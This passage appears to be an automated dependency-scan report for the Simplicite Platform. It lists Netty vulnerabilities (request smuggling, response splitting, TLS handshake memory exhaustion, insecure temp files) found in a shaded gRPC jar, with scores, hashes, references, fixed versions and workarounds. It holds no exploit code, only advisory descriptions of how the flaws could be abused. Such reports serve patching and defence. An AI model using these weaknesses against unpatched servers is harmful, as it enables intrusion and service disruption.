Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast, as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as a proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2022-41915 (OSSINDEX)
Netty project is an event-driven asynchronous network application framework. Starting in version 4.1.83.Final and prior to 4.1.86.Final, when calling `DefaultHttpHeaders.set` with an _iterator_ of values, header value validation was not performed, allowing malicious header values in the iterator to perform HTTP Response Splitting. This issue has been patched in version 4.1.86.Final. Integrators can work around the issue by changing the `DefaultHttpHeaders.set(CharSequence, Iterator<?>)` call into a `remove()` call, and calling `add()` in a loop over the iterator of values.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-41915 for details.
CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
CVSSv2: Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:/C:L/I:L/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec:4.1.38.Final:*:*:*:*:*:*:*
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this purpose it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet, but there are no checks done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a follow-up of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, whose fix missed this one case. This was fixed as part of 4.1.61.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporary storing of uploads on the disk is enabled. On Unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern macOS operating systems. The method "File.createTempFile" on Unix-like systems creates a random file, but by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporary storing of uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows, as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-tcnative-boringssl-static:2.0.25.Final)
Description:
A Mavenized fork of Tomcat Native which incorporates various patches. This artifact is statically linked
to BoringSSL and Apache APR.
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-tcnative-boringssl-static/pom.xml
MD5: 601d7d7c7efa938fa3539002186b140d
SHA1: 8f2aaa5e42b4097ef4f6462b17a61a98a7a995b1
SHA256: aacb7d451c74c5234c82ce176aeb161818831d6d72dcb6eb19ab13f15e87ded6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | netty-tcnative-boringssl-static | Low
Vendor | pom | groupid | io.netty | Highest
Vendor | pom | name | Netty/TomcatNative [BoringSSL - Static] | High
Vendor | pom | parent-artifactid | netty-tcnative-parent | Low
Product | pom | artifactid | netty-tcnative-boringssl-static | Highest
Product | pom | groupid | io.netty | Highest
Product | pom | name | Netty/TomcatNative [BoringSSL - Static] | High
Product | pom | parent-artifactid | netty-tcnative-parent | Medium
Version | pom | version | 2.0.25.Final | Highest
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-transport:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-transport/pom.xml
MD5: 24c9ec380bfb08ee98a2670b9a3ea3ee
SHA1: 734d5091313d67ba6b5dc94e09920fa2453d01d7
SHA256: a92c9e8fcb2b6e8879796a103b080326b17acf821baf04cf11c64521f14289e0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | netty-transport | Low
Vendor | pom | groupid | io.netty | Highest
Vendor | pom | name | Netty/Transport | High
Vendor | pom | parent-artifactid | netty-parent | Low
Product | pom | artifactid | netty-transport | Highest
Product | pom | groupid | io.netty | Highest
Product | pom | name | Netty/Transport | High
Product | pom | parent-artifactid | netty-parent | Medium
Version | pom | version | 4.1.38.Final | Highest
Related Dependencies
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-buffer:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-buffer/pom.xml
MD5: 06d89427dca84970e25763e31bc07244
SHA1: 71d5e38bc0e4b51546f2f4a53eeaa20bd0a73993
SHA256: 2c08702c7b8b87875c47371db3b0d81dc8ec71499a090d4493f57b902cd6cf7f
pkg:maven/io.netty/netty-buffer@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec-http:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec-http/pom.xml
MD5: 955014ef63a0c21125e5d309dc859a92
SHA1: b6f66bd507414001a6993d3307e648098fac1aaa
SHA256: 965c019fc65bc29982af5259dc9f68f0d521376622df469867ec279f06ecc8e5
pkg:maven/io.netty/netty-codec-http@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec-socks:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec-socks/pom.xml
MD5: 6abacecb174a5883f3adff18ac9ea0b6
SHA1: d30d0b8d13f8bbf230876a81862224769fe4f589
SHA256: 2f5135cc248b35fe433c697c397b55a4b7f492624443219ab5ba49129fbaaea1
pkg:maven/io.netty/netty-codec-socks@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-common:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-common/pom.xml
MD5: 1ef6addff2c87906adb92e0cafabcf18
SHA1: a17d7c6632827d06b1fb8ef962529da4ac14c64e
SHA256: 25dc2ba737c50c621b24eaa82aa90fcdda4ff7bb67c598186abee91239fee734
pkg:maven/io.netty/netty-common@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-handler-proxy:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-handler-proxy/pom.xml
MD5: 4339c99a13f4ea860ed0f3ae690822fc
SHA1: 51755eac2b6c566044d0322a45a332297590e182
SHA256: 9433396ee7f781560dc8ffe89e1fe3a3ca3738dd5b45dc09cb412264a1b9f225
pkg:maven/io.netty/netty-handler-proxy@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-handler:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-handler/pom.xml
MD5: 9c540ae604e26aa2a2c57dabff602cef
SHA1: 7722b747cdbaffd1a98e0893bbdac7fdfe906ecb
SHA256: 2336a5ef47b7fe5fdbdeade2dc583b1fc8017d29d6b107e05e63ce4a3c3df384
pkg:maven/io.netty/netty-handler@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-resolver:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-resolver/pom.xml
MD5: 592b55ad9b36109508feed7cde75ed25
SHA1: 83a33ce2aad04aedc9d399e0ba281683ef53e148
SHA256: 6007b2056fd5107882b55d5de83ad868730a0b4d037e9aeb3d68685cf1681d0e
pkg:maven/io.netty/netty-resolver@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-transport-native-epoll:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-transport-native-epoll/pom.xml
MD5: 521ad18d0bd2453793adedd864556e74
SHA1: 43c616d23bac844160a941db51c52253abac3c1c
SHA256: 055d23b46ac0c0e5e1ae38f630f9fa2c726ff196af2dcd828807e625ea8d97ef
pkg:maven/io.netty/netty-transport-native-epoll@4.1.38.Final

grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-transport-native-unix-common:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-transport-native-unix-common/pom.xml
MD5: 9cc9f1d932520d24dc0c3b5b69ade5ca
SHA1: 2604dbad63fddad90523178ee2a694a1bde3e40f
SHA256: a98261af8c9bfefd46b5dc71e93686243b58cd230340d92b1e86f89e88e9af6c
pkg:maven/io.netty/netty-transport-native-unix-common@4.1.38.Final

CVE-2019-20444
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
- FEDORA-2020-66b5f85ccc
- [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image
- [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444)
- [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities
- [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6
- [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12
- [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12
- [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,
- [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list
- [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445
- [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java11 #39
- [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java8 #38
- [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-master-maven-jdk11 #361
- [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E
- DEBIAN - DSA-4885
- MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final
- MISC - https://github.com/netty/netty/issues/9866
- MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update
- MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update
- MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update
- MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update
- OSSINDEX - [CVE-2019-20444] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20444
- OSSIndex - https://github.com/netty/netty/issues/9866
- REDHAT - RHSA-2020:0497
- REDHAT - RHSA-2020:0567
- REDHAT - RHSA-2020:0601
- REDHAT - RHSA-2020:0605
- REDHAT - RHSA-2020:0606
- REDHAT - RHSA-2020:0804
- REDHAT - RHSA-2020:0805
- REDHAT - RHSA-2020:0806
- REDHAT - RHSA-2020:0811
- UBUNTU - USN-4532-1
Vulnerable Software & Versions:
CVE-2019-20445
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
- FEDORA-2020-66b5f85ccc
- [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image
- [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities
- [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6
- [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flume-issues] 20200410 [jira] [Created] (FLUME-3363) CVE-2019-20445
- [flume-issues] 20200415 [jira] [Updated] (FLUME-3363) CVE-2019-20445
- [flume-issues] 20200422 [jira] [Commented] (FLUME-3363) CVE-2019-20445
- [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12
- [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12
- [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list
- [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [spark-issues] 20200309 [jira] [Created] (SPARK-31095) Upgrade netty version to fix security vulnerabilities
- [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445
- [spark-reviews] 20200310 [GitHub] [spark] dongjoon-hyun commented on issue #27870: [SPARK-31095][BUILD][2.4] Upgrade netty-all to 4.1.47.Final
- [zookeeper-dev] 20200203 Re: [VOTE] Apache ZooKeeper release 3.6.0 candidate 1
- [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E
- DEBIAN - DSA-4885
- MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final
- MISC - https://github.com/netty/netty/issues/9861
- MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update
- MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update
- MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update
- MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update
- OSSINDEX - [CVE-2019-20445] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20445
- OSSIndex - https://github.com/netty/netty/issues/9861
- OSSIndex - https://github.com/netty/netty/pull/9865
- OSSIndex - https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E
- REDHAT - RHSA-2020:0497
- REDHAT - RHSA-2020:0567
- REDHAT - RHSA-2020:0601
- REDHAT - RHSA-2020:0605
- REDHAT - RHSA-2020:0606
- REDHAT - RHSA-2020:0804
- REDHAT - RHSA-2020:0805
- REDHAT - RHSA-2020:0806
